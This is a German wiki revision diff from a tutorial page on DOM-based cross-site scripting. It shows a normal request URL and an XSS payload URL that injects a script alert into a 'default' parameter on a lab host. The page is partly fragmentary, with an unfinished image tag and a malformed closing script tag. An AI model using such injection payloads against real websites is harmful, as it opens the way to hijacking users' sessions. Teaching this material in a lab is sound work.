Cross-Site-Scripting "DOM-basiertes" Beispiele: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 11: Zeile 11:
 
== Normale Verhaltensweise ==
 
== Normale Verhaltensweise ==
  
 +
* Über den GET-Parameter ''default'' wird der Inhalt dieser Seite generiert
 
* http://opfer.secure.local/scripts/xss-dom.html?default=Bitte%20auf%20dieser%20Seite%20JavaScript%20ausschalten
 
* http://opfer.secure.local/scripts/xss-dom.html?default=Bitte%20auf%20dieser%20Seite%20JavaScript%20ausschalten
 +
 +
[[Bild:
  
 
== Exploit über die URL ==
 
== Exploit über die URL ==
  
 
* http://opfer.secure.local/scripts/xss-dom.html?default=<script>alert("Hacked by Xinux")<script>
 
* http://opfer.secure.local/scripts/xss-dom.html?default=<script>alert("Hacked by Xinux")<script>

Version vom 7. März 2023, 11:28 Uhr

Cross-Site-Scripting “Reflected”

Um was geht es?

Link

Normale Verhaltensweise

[[Bild:

Exploit über die URL